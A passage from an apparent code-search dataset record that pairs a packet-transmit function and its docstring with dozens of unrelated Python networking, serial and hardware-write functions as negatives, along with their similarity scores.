print(ip_prefix + \"\\t..1. ... = More fragments: set\")\r\n flag_offset = str((int(ip_header[5][2:3])))\r\n print(ip_prefix + \"Fragment offset = \" + flag_offset + \" bytes\")\r\n print(ip_prefix + \"Time to live = \" + str(ip_header[6]) + \" seconds/hops\")\r\n if protocol == 1:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (ICMP)\")\r\n if protocol == 17:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (UDP)\")\r\n if protocol == 6:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (TCP)\")\r\n print(ip_prefix + \"Header checksum = \" + str(ip_header[8]))\r\n print(ip_prefix + \"Source address = \" + str(ip_header[9]))\r\n print(ip_prefix + \"Destination address = \" + str(ip_header[10]))\r\n if ip_header[11] == \"\":\r\n print(ip_prefix + \"No options\")\r\n else:\r\n print(ip_prefix + \"Options: \" + ip_header[11])\r\n print(ip_prefix)\r\n\r\n if protocol == 1:\r\n print(icmp_prefix + \"----- ICMP Header -----\")\r\n print(icmp_prefix)\r\n if str(data_header[0]) == \"8\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo request)\")\r\n elif str(data_header[0]) == \"0\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo reply)\")\r\n else:\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]))\r\n print(icmp_prefix + \"Code = \" + str(data_header[1]))\r\n print(icmp_prefix + \"Checksum = \" + str(data_header[2]))\r\n print(icmp_prefix)\r\n\r\n elif protocol == 6:\r\n print(tcp_prefix + \"----- TCP Header -----\")\r\n print(tcp_prefix)\r\n print(tcp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(tcp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(tcp_prefix + \"Sequence number = \" + str(data_header[2]))\r\n print(tcp_prefix + \"Acknowledgement number = \" + str(data_header[3]))\r\n print(tcp_prefix + \"Data offset = \" + str(data_header[4]) + \" bytes\")\r\n flag = str(data_header[5])\r\n print(tcp_prefix + \"\\tReserved: Not set\")\r\n print(tcp_prefix + \"\\tNonce: Not set\")\r\n if flag[0] == \"0\":\r\n print(tcp_prefix + \"\\tCWR: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tCWR: Set\")\r\n if flag[1] == \"0\":\r\n print(tcp_prefix + \"\\tECN-Echo : No set\")\r\n else:\r\n print(tcp_prefix + \"\\tECN-Echo: Set\")\r\n if flag[2] == \"0\":\r\n print(tcp_prefix + \"\\tUrgent: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tUrgent: Set\")\r\n if flag[3] == \"0\":\r\n print(tcp_prefix + \"\\tAcknowledgment: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tAcknowledgment: Set\")\r\n if flag[4] == \"0\":\r\n print(tcp_prefix + \"\\tPush: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tPush: Set\")\r\n if flag[5] == \"0\":\r\n print(tcp_prefix + \"\\tReset: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tReset: Set\")\r\n if flag[6] == \"0\":\r\n print(tcp_prefix + \"\\tSyn: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tSyn: Set\")\r\n if flag[7] == \"0\":\r\n print(tcp_prefix + \"\\tFin: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tFin: Set\")\r\n print(tcp_prefix + \"Window = \" + str(data_header[6]))\r\n print(tcp_prefix + \"Checksum 0x= \" + str(data_header[7]))\r\n print(tcp_prefix + \"Urgent pointers = \" + str(data_header[8]))\r\n if data_header[9] != 0:\r\n print(tcp_prefix + \"Options\")\r\n else:\r\n print(tcp_prefix + \"No options\")\r\n print(tcp_prefix)\r\n\r\n elif protocol == 17:\r\n print(udp_prefix + \"----- UDP Header -----\")\r\n print(udp_prefix)\r\n print(udp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(udp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(udp_prefix + \"Length = \" + str(data_header[2]))\r\n print(udp_prefix + \"Checksum = \" + str(data_header[3]))\r\n print(udp_prefix)", "def out(self, out):\n\n self._out = out", "def packet_out(self, data, in_port, out_port, out_queue, nq=0):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n dpid = self.datapath.id\n #*** First build OF version specific list of actions:\n if nq:\n #*** Packet out with no queue (nq):\n actions = [self.datapath.ofproto_parser.OFPActionOutput \\\n (out_port, 0)]\n\n else:\n #*** Note: out_port must come last!\n actions = [\n parser.OFPActionSetQueue(out_queue),\n parser.OFPActionOutput(out_port, 0)]\n\n #*** Now have we have actions, build the packet out message:\n out = parser.OFPPacketOut(\n datapath=self.datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=in_port, actions=actions, data=data)\n\n self.logger.debug(\"Sending Packet-Out message dpid=%s port=%s\",\n dpid, out_port)\n #*** Tell the switch to send the packet:\n self.datapath.send_msg(out)", "def writer(self):\n #while self.alive:\n try:\n icmpreq = ethernet.Ethernet(src_s=\"dc:a6:32:00:a7:8b\", dst_s=\"ec:84:b4:3e:c8:20\", type=ethernet.ETH_TYPE_IP) +\\\n ip.IP(p=ip.IP_PROTO_ICMP, src_s=\"192.168.1.35\", dst_s=\"172.217.166.110\") +\\\n icmp.ICMP(type=8) +\\\n icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b\"12345678901234567890\")\n self.serial.write(icmpreq.bin()+b'~')\n except socket.error as msg:\n print(msg)\n self.stop()", "def write(self, proto):\n pass", "def _vendor_request_out(self, request, value=0, index=0, data=None, timeout=1000):\n return self._vendor_request(usb.ENDPOINT_OUT, request, value=value,\n index=index, length_or_data=data, timeout=timeout)", "def send(self, data):", "def transmit(self, message):\n pass", "def send_byte(byte_out):\n GPIO.output(clock_pin, 0)\n # set the chip select to write\n GPIO.output(chip_select, 1)\n # send the byte \n values = [(ord(byte_out) >> i) % 2 for i in range(0, 8)]\n GPIO.setup(data_pins, GPIO.OUT)\n GPIO.output(data_pins, values)\n # flash the clock pin\n GPIO.output(clock_pin, 1)\n GPIO.output(clock_pin, 0)", "def output(self, p_addr = 0):\n\t\tout_pos = self.get_address(p_addr, 1)\n\t\tself.out_param += [self.get_data(out_pos)]\n\t\tif self.debug:\n\t\t\tprint(\"DIAGNOSTIC:\", self.out_param[-1])\n\t\tself.pos += 2", "def _send_data_to_nn(self,wbtData):\n\t\tself._neuralNetwork.stdin.write(\"COMM IN\\n\") # this shitty COMM IN is not really needed..to modify in closedloop.py\n\t\tself._neuralNetwork.stdin.write(wbtData)", "def act_like_hub (self, packet, packet_in):\n # We want to output to all ports -- we do that using the special\n # OFPP_ALL port as the output port. (We could have also used\n # OFPP_FLOOD.)\n self.resend_packet(packet_in, of.OFPP_ALL)\n\n # Note that if we didn't get arp_req valid buffer_id, arp_req slightly better\n # implementation would check that we got the full data before\n # sending it (len(packet_in.data) should be == packet_in.total_len)).", "def callback_serial_write(data):\n serial_write(data.data)", "def message_ports_out(self):\n return _spacegrant_swig.binary_sink_sptr_message_ports_out(self)", "def outWriteEvent(self):\r\n pass", "def _post(self, *args, **kwargs):\n return _uhd_swig.usrp_sink_sptr__post(self, *args, **kwargs)", "def send_packet(sender, payload):\n sender.write(payload)", "def write(self, data):\n\t\tself.outputbuffer.write(data)", "def _post(self, which_port: \"swig_pmt_ptr\", msg: \"swig_pmt_ptr\") -> \"void\":\n return _beamforming_swig.phasedarray_sptr__post(self, which_port, msg)", "def send_packet(sender, payload):\n\n sender.write(payload)", "def send_to_engine(self, wi):\n pass", "def __send__(self,val):\n assert(len(val) == 1)\n assert(type(val) == bytes)\n v = int.from_bytes(val,byteorder=\"little\")\n if(self.verbose):\n pc.color_stdout(\"GREEN\")\n print(\">> %s\\t - %s\\t - %d\"% (hex(v),bin(v),v))\n pc.color_stdout(\"RESET\")\n self.port.write(val)", "def out_data(self, port: int) -> Optional[Any]:\n try:\n return copy(self.outputs[port])\n except:\n return None", "def _post(self, which_port, msg):\n return _spacegrant_swig.hdlc_framer_sptr__post(self, which_port, msg)", "def __init__(self, address, ap, data):\n super(WriteRequest, self).__init__(address=address, ap=ap, data=data)", "def send_to_port(self):\r\n time.sleep(2)\r\n # ser.write(\"R\".encode())\r\n ser.flush()\r\n ser.write(\"{},{},{},{},{}\".format(self.x_Pos, self.y_Pos, self.t_Tap, self.U_on, self.u_off).encode())\r\n # ser.flush()\r\n # while (1 == 1):\r\n # mydata = ser.readline().lstrip()\r\n # print(mydata.decode('utf-8'))\r\n # value = str(mydata)\r", "def packet_write(self):\n bytes_written = 0\n \n if self.sock == NC.INVALID_SOCKET:\n return NC.ERR_NO_CONN, bytes_written\n \n while len(self.out_packet) > 0:\n pkt = self.out_packet[0]\n write_length, status = nyamuk_net.write(self.sock, pkt.payload)\n if write_length > 0:\n pkt.to_process -= write_length\n pkt.pos += write_length\n \n bytes_written += write_length\n \n if pkt.to_process > 0:\n return NC.ERR_SUCCESS, bytes_written\n else:\n if status == errno.EAGAIN or status == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_written\n elif status == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_written\n else:\n return NC.ERR_UNKNOWN, bytes_written\n \n \"\"\"\n if pkt.command & 0xF6 == NC.CMD_PUBLISH and self.on_publish is not None:\n self.in_callback = True\n self.on_publish(pkt.mid)\n self.in_callback = False\n \"\"\"\n \n #next\n del self.out_packet[0]\n \n #free data (unnecessary)\n \n self.last_msg_out = time.time()\n \n \n return NC.ERR_SUCCESS, bytes_written", "def writetif(self,outputname,):\n pass", "def server_do(self,input, connstream):\r\n pass", "def send_packet(self, buffer_id, raw_data, out_port, in_port):\n # We tell the switch to take the packet with id buffer_if from in_port \n # and send it to out_port\n # If the switch did not specify a buffer_id, it must have specified\n # the raw data of the packet, so in this case we tell it to send\n # the raw data\n msg = of.ofp_packet_out()\n msg.in_port = in_port\n if buffer_id != -1 and buffer_id is not None:\n # We got a buffer ID from the switch; use that\n msg.buffer_id = buffer_id\n else:\n # No buffer ID from switch -- we got the raw data\n if raw_data is None:\n # No raw_data specified -- nothing to send!\n return\n msg.data = raw_data\n \n # Add an action to send to the specified port\n if out_port == of.OFPP_FLOOD:\n # send to all active ports according to STP\n for outPort in self.ports_use:\n if outPort != in_port:\n action = of.ofp_action_output(port=outPort)\n msg.actions.append(action)\n else:\n action = of.ofp_action_output(port=out_port)\n msg.actions.append(action)\n # Send message to switch\n self.connection.send(msg)", "def transmit(self, data, response_schema, secondary=False):\n\n if secondary:\n address = self.secondary_receiver_address\n else:\n address = self.receiver_address\n logger.info(\n f\"Starting new connection to {address} with \" f\"secure={self.use_tls}\"\n )\n\n with TCPTransport(address, secure=self.use_tls) as transport:\n transport.connect()\n\n transport.send(data.encode(self.ENCODING))\n\n return self._receive(transport, response_schema)", "def _send(self, frame):\n \n self.device.write(frame)", "def serialTransmit( motorInput ):\n\n\tpub = rospy.Publisher('/rxtx/sendMA', UInt8MultiArray)\n\tstartByte = 58 # ':'\t\n\tmotorByteToSend = int( '00000000', 2 ) \n\tarmByteToSend = int( '00000000', 2 ) \n\tbuttonByteToSend = int( '00000000', 2 ) \n\tchecksumByteToSend = 123\n\n\t#rospy.loginfo(\"MotorByteToSend: \" + str( motorByteToSend ) )\n\t\n\tif motorInput.leftMotor > 50:\n\t\t# Set bit to forward\n\t\tmotorByteToSend += 1 << 7\n\n\tif motorInput.rightMotor > 50: \n \t\t# Set bit to forward\n\t\tmotorByteToSend += 1 << 3\n\n\t# Set Mag divided into 3 quadrents, \n\tif motorInput.leftMotor < ( 50 / 3 ) or motorInput.leftMotor > ( 100 - ( 50 / 3 ) ):\n\t\t# Set to 3 \n\t\tmotorByteToSend += 1 << 6\n\t\tmotorByteToSend += 1 << 5\n\telif motorInput.leftMotor < ( ( 50 / 3 ) * 2 ) or motorInput.leftMotor > ( 100 - ( ( 50 / 3 ) * 2 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 6\n\telif motorInput.leftMotor < ( ( 50 / 3 ) * 3 ) or motorInput.leftMotor > ( 100 - ( ( 50 / 3 ) * 3 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 5\t\n \n\t# Set Mag divided into 3 quadrents, \n\tif motorInput.rightMotor < ( 50 / 3 ) or motorInput.rightMotor > ( 100 - ( 50 / 3 ) ):\n\t\t# Set to 3 \n\t\tmotorByteToSend += 1 << 1\n\t\tmotorByteToSend += 1 << 0\n\telif motorInput.rightMotor < ( ( 50 / 3 ) * 2 ) or motorInput.rightMotor > ( 100 - ( ( 50 / 3 ) * 2 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 1\n\telif motorInput.rightMotor < ( ( 50 / 3 ) * 3 ) or motorInput.rightMotor > ( 100 - ( ( 50 / 3 ) * 3 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 0\t\n\n\n\tmessage = struct.pack('>BBBBB', startByte, motorByteToSend, armByteToSend, buttonByteToSend, checksumByteToSend )\n\n\n\n\t# Old Test Code\n\t#\tif motorInput.leftMotor == 50 and motorInput.rightMotor == 50:\n\t#\tmessage = struct.pack('>BBBBB', ';', motorInput.leftMotor, motorInput.rightMotor)\t\t\t\n\t\t#message = struct.pack('>BBB', 123, motorInput.leftMotor, motorInput.rightMotor)\n\t#\telse:\n\t#\tmessage = struct.pack('>BBBBB', 122, motorInput.leftMotor, motorInput.rightMotor)\n\t\t#message = struct.pack('>BBB', 122, motorInput.leftMotor, motorInput.rightMotor)\n\n\n\tpub.publish( data=message )\n\t#rospy.loginfo(message)", "def send_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n out = self._build_packet_out(datapath, buffer_id,\r\n src_port, dst_port, data)\r\n if out:\r\n datapath.send_msg(out)", "def _send(self, what, value, address='localhost:44818', **kwargs):\n\n tag_string = ''\n tag_string = EnipProtocol._tuple_to_cpppo_tag(what, value)\n # print 'DEBUG enip _send tag_string: ', tag_string\n\n cmd = shlex.split(\n self._client_cmd +\n '--log ' + self._client_log +\n '--address ' + address +\n ' ' + tag_string\n )\n # print 'DEBUG enip _send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR enip _send: ', error)", "def make_output_port(cls, data_class=None):\n class ReturnedOutputPort(OutputPort):\n\n \"\"\"A subclass of InputPort accepting provided types.\"\"\"\n\n def emits(self):\n \"\"\"Return the class emitted by the port.\"\"\"\n return data_class\n\n return ReturnedOutputPort", "def write(self, out, message):\n if out != None:\n out.write(message)", "def write( data ):", "def outReceived(self, data):\n self.protocol.dataReceived(data)", "def message_ports_out(self):\n return _uhd_swig.usrp_sink_sptr_message_ports_out(self)", "def s_write(self, data):\n self.s.flushOutput()\n\n if self.s.is_open:\n try:\n self.s.write(data)\n if self.log_output:\n self.logfile.write('\\nIN :' + str(len(data)) + '[' + hexlify(data) + ']' + '\\n')\n except Exception as e:\n print(\"Could not write to port \" + str(e))\n else:\n raise IOError('Comport is not open, use ctl_connect()')", "def send(self, output):\n assert output == 0 or output == 1\n GPIO.output(self.d_out, output)", "def handle_write(self):\n #send_types = \" + \".join(\n # messages.get_message_type(message) for message in self.buffer)\n for message in self.buffer:\n if isinstance(message, str):\n self.send(message)\n else:\n self.send(message.pack())\n self.buffer = []\n #print \"To %s:%s sent: \" % (self.address, self.port), send_types", "def send(self, value, _control=False):\n if not _control:\n self.increment('out')\n for output in self.outputs:\n output.put(value)", "def transmit(self) -> None:\n # Like RadioHead library, turn on high power boost if enabled.\n self.set_boost(_TEST_PA1_BOOST)\n # Enable packet sent interrupt for D0 line.\n self.dio_0_mapping = 0b00\n # Enter TX mode (will clear FIFO!).\n self.operation_mode = TX_MODE", "def send_on_output_port_change(self):\n return self._send_on_output_port_change", "def output_data_type(self):\n return PassThrough", "def write(self, output_buffer):\n self.__writer_func(self.__stream_id, output_buffer)", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr__post(self, which_port, msg)", "def myTransmit(self, connection, apdu):\n # trace request :\n #print 'sending : \\t', toHexString(apdu)\n response, sw1, sw2 = connection.transmit( apdu )\n # trace response :\n #if None == response: response=[]\n #print 'response : \\t', toHexString(response), '\\nstatus words : \\t', \"%x %x\" % (sw1, sw2)\n if sw1 in range(0x61, 0x6f):\n print \"Error: sw1: %x sw2: %x\" % (sw1, sw2)\n return response, sw1, sw2", "def transmit_data(self, data: str, target_node: str = None):\n raise NotImplementedError", "def send_output(self, result, output):\n data = pickle.dumps((result, output))\n self.wfile.write('%d\\n' % len(data))\n self.wfile.write(data)\n self.wfile.flush()", "def _post(self, which_port: \"swig_pmt_ptr\", msg: \"swig_pmt_ptr\") -> \"void\":\n return _beamforming_swig.doaesprit_sptr__post(self, which_port, msg)", "def write(self, buffer):\n utils.print_for_unimplemented_functions(SPI.write.__name__)\n telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_SPI)", "def writeOutput(self, output):", "def send(self, data: bytes):", "def message_ports_out(self):\n return _uhd_swig.usrp_source_sptr_message_ports_out(self)", "def outReceived(self, data):\n if data[0:4] == \"port\":\n port = data.split(':')[1]\n self.deferred.callback(port)", "def write_tdm_to_pipe(pkt):\n\n global g_tdm_cnt\n global g_pipein\n\n if UDP in pkt:\n if pkt[UDP].dport == TDM_PORT:\n g_pipein.write(bytes(pkt[UDP].payload))\n g_tdm_cnt += 1\n print(\"\\rTDM Count: {0}. CTRL-C to quit\".format(g_tdm_cnt), end=\" \")", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr__post(self, which_port, msg)", "def _write_v1(self, data):\n return self.usb_dev.write(self.ep_out, data, self.interface, self.usb_wr_timeout)", "def write(self, msg, *_):\n if self.out is not None:\n self.out.write(msg)\n self.out.flush()", "def full_out_address(self) -> str:\n return f'{self.host}:{self.port_out}'", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def message_ports_out(self):\n return _spacegrant_swig.G3RUH_descramble_sptr_message_ports_out(self)", "def message_ports_out(self):\n return _spacegrant_swig.DeNRZI_sptr_message_ports_out(self)", "def handle_output(self, workunit, label, s):\r\n pass", "def handle_output(self, workunit, label, s):\r\n pass", "def output_ports(self):\n return {\n 'audio_signal': NeuralType(('B', 'T'), AudioSignal(freq=self._sample_rate)),\n 'a_sig_length': NeuralType(tuple('B'), LengthsType()),\n 'label': NeuralType(tuple('B'), LabelsType()),\n 'label_length': NeuralType(tuple('B'), LengthsType()),\n }", "def _build_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n actions = []\r\n if dst_port:\r\n actions.append(datapath.ofproto_parser.OFPActionOutput(dst_port))\r\n\r\n msg_data = None\r\n if buffer_id == datapath.ofproto.OFP_NO_BUFFER:\r\n if data is None:\r\n return None\r\n msg_data = data\r\n\r\n out = datapath.ofproto_parser.OFPPacketOut(\r\n datapath=datapath, buffer_id=buffer_id,\r\n data=msg_data, in_port=src_port, actions=actions)\r\n return out", "def Transaction(self,OutBuffer, read = 0):\n ReceiveBuffer = create_string_buffer(chr(0) * 0x80)\n TransmitBuffer= create_string_buffer(OutBuffer)\n Transaction = spi_ioc_transfer()\n Transaction.speed_hz = c_uint32(self.Speed)\n Transaction.tx_buf=addressof(TransmitBuffer)\n Transaction.rx_buf=addressof(ReceiveBuffer)\n Transaction.delay_usecs = self.Delay\n if read > 0 and self.Speed!= self.ReadSpeed: # Slow down speed for reading\n Transaction.speed_hz = self.ReadSpeed\n elif read==0 and self.Speed!=self.WriteSpeed:\n Transaction.speed_hz = self.WriteSpeed\n if self.Speed != Transaction.speed_hz:\n self.Speed = Transaction.speed_hz\n self.SetSpeed()\n if read > len(OutBuffer):\n Transaction.len=read\n else:\n Transaction.len= len(OutBuffer)\n Transaction.bits_per_word = self.Bits\n Transaction.cs_change = 0\n Transaction.pad = 0\n # print type(addressof(Transaction))\n ret = ioctl(self.File,SPI_IOC_MESSAGE(1), addressof(Transaction))\n return ret, ReceiveBuffer", "def outgoing(self,message,isBinary=False,identifier=None):\n pass", "def transmit(self, package):\n \n self.client = JsonClient()\n self.client.connect()\n self.client.sendPackage(package)\n msg = self.client.readPackage()\n \n return msg", "def SendOutputs(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def message_ports_out(self):\n return _spacegrant_swig.general_burster_2_sptr_message_ports_out(self)", "def output(self, _in, out, **kwds):\n out.write(_in.read())", "def write_byte(self, addr, data):\n raise NotImplementedError()", "def message_ports_out(self):\n return _spacegrant_swig.NRZI_sptr_message_ports_out(self)", "def dumpData(self,out,index):\n #--SCVR\n out.pack('4siBB2sB',\n 'SCVR', 5+len(self.text), index+48, self.type, self.func, self.oper)\n if self.text: out.write(self.text)\n #--Value\n if isinstance(self.value,int):\n out.packSub('INTV','i', self.value)\n else:\n out.packSub('FLTV','f', self.value)", "def emit(data):", "def transmit(self, message):\n\n\t\t#Keep track of number of Hello packets sent\n\t\tif message == 'Hello?':\n\t\t\tself.missingCount += 1\n\n\t\t#Packetiser message and inform server of new data\n\t\tself.txData = self.packetiser.pack(message)\n\t\tself.txEvt.set()", "def write_pkts(self, pkt_list):\r\n while True:\r\n # wait for the next transmission\r\n yield self.wait_sys_clks(1)\r\n\r\n # send one word at a time\r\n if len(pkt_list) == 0:\r\n # no more data to send so send blanks\r\n tdata = '\\x00'*self.bus_width\r\n tuser = Tuser(0, 0, 0)\r\n msg = AXI_S_message(tdata,0,0,0,tuser)\r\n self.out_pipe.put(msg)\r\n else:\r\n # send packets\r\n pkt = pkt_list[0]\r\n yield self.env.process(self.send_pkt(pkt))\r\n # remove the pkt we just sent from the pkt_list\r\n pkt_list = pkt_list[1:]", "def comTxRx(self, cmd, dataOut, length):\n if DEBUG > 1: sys.stderr.write(\"* comTxRx()\\n\")\n txFrame = b''\n rxHeader = 0\n rxNum = 0\n\n #Transmitting part ----------------------------------------\n #Prepare data for transmit\n if (length % 2) != 0:\n #/* Fill with one byte to have even number of bytes to send */\n if self.protocolMode == self.MODE_BSL:\n dataOut.append(0xFF) #fill with 0xFF\n else:\n dataOut.append(0) #fill with zero\n\n txFrame = bytes([self.DATA_FRAME | self.seqNo, cmd, len(dataOut), len(dataOut)])\n\n self.reqNo = (self.seqNo + 1) % self.MAX_FRAME_COUNT\n\n txFrame = txFrame + dataOut\n checksum = self.calcChecksum(txFrame, length + 4)\n txFrame = txFrame + bytes([checksum & 0xff])\n txFrame = txFrame + bytes([(checksum >> 8) & 0xff])\n\n accessAddr = (0x0212 + (checksum ^ 0xffff)) & 0xfffe # 0x0212: Address of wCHKSUM\n if self.BSLMemAccessWarning and accessAddr < self.BSL_CRITICAL_ADDR:\n sys.stderr.write(\"WARNING: This command might change data at address %04x or %04x!\\n\" % (accessAddr, accessAddr + 1))\n\n self.serialport.flushInput() #clear receiving queue\n #TODO: Check after each transmitted character,\n #TODO: if microcontroller did send a character (probably a NAK!).\n for c in txFrame:\n self.serialport.write(bytes([c]))\n if DEBUG > 3: sys.stderr.write(\"\\ttx %02x\" % c)\n #if self.serialport.inWaiting(): break #abort when BSL replies, probably NAK\n else:\n if DEBUG > 1: sys.stderr.write(\" comTxRx() transmit OK\\n\")\n\n #Receiving part -------------------------------------------\n rxHeader, rxNum = self.comRxHeader() #receive header\n if DEBUG > 1: sys.stderr.write(\" comTxRx() rxHeader=0x%02x, rxNum=%d, seqNo=%d, reqNo=%s\\n\" % (rxHeader, rxNum, self.seqNo, self.reqNo))\n if rxHeader == self.DATA_ACK: #acknowledge/OK\n if DEBUG > 2: sys.stderr.write(\" comTxRx() DATA_ACK\\n\")\n if rxNum == self.reqNo:\n self.seqNo = self.reqNo\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() DATA_ACK OK\\n\")\n return #Acknowledge received correctly => next frame\n raise BSLException(self.ERR_FRAME_NUMBER)\n elif rxHeader == self.DATA_NAK: #not acknowledge/error\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() DATA_NAK\\n\")\n raise BSLException(self.ERR_RX_NAK)\n elif rxHeader == self.DATA_FRAME: #receive data\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() DATA_FRAME\\n\")\n if rxNum == self.reqNo:\n rxFrame = self.comRxFrame(rxNum)\n return rxFrame\n raise BSLException(self.ERR_FRAME_NUMBER)\n elif rxHeader == self.CMD_FAILED: #Frame ok, but command failed.\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() CMD_FAILED\\n\")\n raise BSLException(self.ERR_CMD_FAILED)\n\n raise BSLException(\"Unknown header 0x%02x\\nAre you downloading to RAM into an old device that requires the patch? Try option -U\" % rxHeader)", "def message_ports_out(self):\n return _spacegrant_swig.ax25_pdu_packer_sptr_message_ports_out(self)" ]
[ "0.5656294", "0.5640042", "0.5389474", "0.53658545", "0.52940327", "0.52939874", "0.5285707", "0.51725745", "0.51605856", "0.5146283", "0.51232743", "0.5088026", "0.5069205", "0.50586265", "0.50550586", "0.50533634", "0.50321823", "0.5028129", "0.49887457", "0.4957033", "0.4946684", "0.49410564", "0.4940173", "0.4939851", "0.4922899", "0.49202242", "0.49056667", "0.48948038", "0.4893408", "0.48837185", "0.48783392", "0.48656043", "0.48623356", "0.48585415", "0.48577854", "0.48412442", "0.4837226", "0.48307425", "0.4830727", "0.48223415", "0.48149243", "0.48100314", "0.4808379", "0.48031336", "0.47983825", "0.47902742", "0.47891858", "0.47880217", "0.47867602", "0.47822276", "0.47777483", "0.47699493", "0.47674575", "0.47656888", "0.47581092", "0.47344965", "0.47258064", "0.47177288", "0.46936885", "0.46864998", "0.46849874", "0.4684327", "0.46821818", "0.46807548", "0.46801513", "0.4679476", "0.4677317", "0.4677267", "0.46708405", "0.4667947", "0.4665545", "0.46637154", "0.4663524", "0.46627697", "0.46620202", "0.46600577", "0.46558785", "0.46555975", "0.4652437", "0.46511704", "0.4646952", "0.4646281", "0.46406084", "0.46406084", "0.46396372", "0.46373197", "0.46361962", "0.4630272", "0.46298832", "0.4621737", "0.46196014", "0.46134067", "0.46054935", "0.4604459", "0.4603902", "0.4603777", "0.4596059", "0.45908573", "0.45881534", "0.4586964" ]
0.655866
0
Process interface that sends a packet parsed_packet The packet instance to transmit
def process(self, parsed_packet): byte_buf = parsed_packet.serialize() out_port= parsed_packet.get_field("intrinsic_metadata.egress_port") logging.debug("Transmit pkt id %d to %d" % (parsed_packet.id, out_port)) buf = bytearray(byte_buf) for idx in range((len(buf) + 19)/20): logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20)) self.transmit_handler(out_port, byte_buf)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process(self, packet):\n pass", "def process(self, pkt):\n pass", "def _do_some_logic(self, packet):\n\n\n pass", "def process_packet(self, in_port, packet):\n \n buf = bytearray(packet)\n for idx in range((len(packet) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n if self.disabled:\n logging.debug(\"Switch is disabled; discarding packet\")\n return\n\n parsed_packet = ParsedPacket(buf, self.metadata)\n logging.debug(\"Processing packet %d from port %d with %s\" % \n (parsed_packet.id, in_port,\n self.first_processor.name))\n self.first_processor.process(parsed_packet)", "def handle_packet(cls, packet: scapypacket):\n pass", "def _pkt_handle(self, pkt):\n\n # snag any left over data from last read()\n # Parse the header to get type\n offset, payload_len, subtype, nxp_sniffer = lowpan.message.parse_header(pkt[0])\n\n\n # Extract the raw message bytes\n rawmsg = pkt[0][offset : offset + payload_len]\n if self.debug:\n print(pkt[1])\n print(util.hex_dump_buffer(rawmsg))\n\n\n\n # Now check for message handlers; preference is given to\n # handlers for a specific packet\n handled = False\n # Send to bridge socket\n if self.bdg_unix_addr:\n self.bridge_socket.sendto(rawmsg,self.bdg_unix_addr)\n handled = True\n\n if subtype in self.handlers.keys():\n handled = self.handlers[subtype](self, nxp_sniffer, rawmsg)\n if not handled and (\"all\" in self.handlers.keys()):\n handled = self.handlers[\"all\"](self, nxp_sniffer, rawmsg)\n\n if not handled: # Not handled, enqueue\n with self.packets_cv:\n if len(self.packets) >= self.max_pkts:\n 